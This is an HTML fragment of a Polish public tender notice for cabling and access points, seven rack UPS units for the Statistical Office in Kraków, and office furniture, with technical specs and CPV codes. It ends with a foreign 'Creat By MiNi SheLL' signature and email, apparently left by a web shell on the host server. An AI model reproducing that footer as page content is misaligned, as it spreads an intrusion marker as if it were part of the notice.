<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> rozbudowa sieci energetycznej i strukturalnej (punkty dostępowe) - 12 sztuk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Szczegółowy zakres zamówienia zawiera Opis Przedmiotu Zamówienia, stanowiący załącznik nr 9 i 9a do SIWZ.
Wykonawca zobowiązany jest do sporządzenia dokumentacji powykonawczej zrealizowanego systemu okablowania strukturalnego wraz z dedykowanym zasilaniem elektrycznym i przekazania jej Zamawiającemu w dwóch egzemplarzach w języku polskim w formie papierowej oraz w formie elektronicznej w ogólnie przyjętym standardzie plików np. *.dwg lub *.pdf..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.41.00.00-0, 45.31.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 31.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa 7 sztuk UPS do Urzędu Statystycznego w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa elementu, parametru lub cechy	Opis wymagań
Moc pozorna  3000 VA
Moc rzeczywista  2700 W
Architektura UPSa 	podwójne przetwarzanie on-line, VFI wg PN-EN 62040 3
Maks. czas przełączenia na baterię 0 ms
Kształt napięcia wyjściowego przy pracy bateryjnej Sinusoidalny
Typ gniazda wejściowego 	 IEC320 C20 16A 
Czas podtrzymania dla obciążenia 100% przy współczynniku cos  0,9 min. 3 minut
Czas podtrzymania przy obciążeniu 50% przy współczynniku cos  0,9 min. 9 minut
Czas podtrzymania dla obciążenia 100% z dodatkowym modułem baterii przy współczynniku cos  0,9 min. 18 minut
Czas podtrzymania przy obciążeniu 50% z dodatkowym modułem baterii przy współczynniku cos 0,9 min. 45 minut
Zakres napięcia wejściowego w trybie podstawowym  180  276 V
Zakres zmian napięcia wyjściowego	 maksymalnie  2% wartości nominalnej
Baterie wymieniane przez użytkownika na gorąco Tak
Możliwość uruchomienia zasilacza z baterii tzw. Zimny start  Tak
Baterie wewnętrzne, bezobsługowe o minimalnej pojemności 9Ah 12V, minimum 6 szt. 
Dodatkowy moduł baterii Tak
Porty komunikacji 	 RS232, USB, gniazdo rozszerzenia opcji komunikacji do instalacji karty SNMP Web z możliwością monitorowania środowiska, gniazdo wyłącznika awaryjnego p.poż. 
Panel komunikacyjny Graficzny panel LCD z odczytem parametrów zasilacza, informacjami o stanie jego pracy i informacjami o alarmach
Typ obudowy  Rack 19, maksymalna wysokość 2U
Dołączone oprogramowanie 	Do bezpiecznego zamykania systemów operacyjnych przy wyczerpaniu baterii minimum:
- Windows: 7  2008  Vista 2003  XP
- Linux: Debian GNU Linux: Lenny,
 SUSE Novell: SLES 11, OpenSUSE 11.2, 
Redhat Enterprise Linux: RHEL 5.3, 5.4, 5.5, Fedora core 12 
Ubuntu: 10.04
- VMWare: ESX 4, ESXi 4 (wersja komercyjna), ESXi 4.10 (wersja komercyjna)
- Hyper-V: Hyper-V i  Hyper V Server.) Oprogramowanie pozwlające na integrację z platformą wirtualizacyjną Vmware: vCenter Server
System zarządzania pracą baterii	System nieciągłego ładowania baterii. Do oferty dołączyć należy opis algorytmu ładowania nieciągłego baterii. W opisie znaleźć się muszą informacje nt. trwania okresów ładowania forsującego, konserwującego i okresu spoczynkowego (tzw. restingu). Okres spoczynkowy w jednym cyklu nie może być krótszy niż 14 dni. Opis powinien być materiałem firmowym producenta lub musi być przez niego potwierdzony.
Cechy	 Możliwość wydłużenia czasu podtrzymania do 65 min. przy 100% obc. poprzez dołączenie baterii zewnętrznych, wysokość systemu po wydłużeniu czasu podtrzymania do 65 min. nie może przekroczyć 10U
Gwarancja producenta minimum 24 miesiące Tak.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.15.40.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wyposażenie w meble pomieszczeń Informatorium w ramach projektu SISP-2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wyposażenie w meble pomieszczeń Informatorium w ramach projektu SISP-2.
Szczegółowy zakres zamówienia zawiera Opis Przedmiotu Zamówienia, stanowiący załączniki nr 20 i 20a-20e do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 31.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com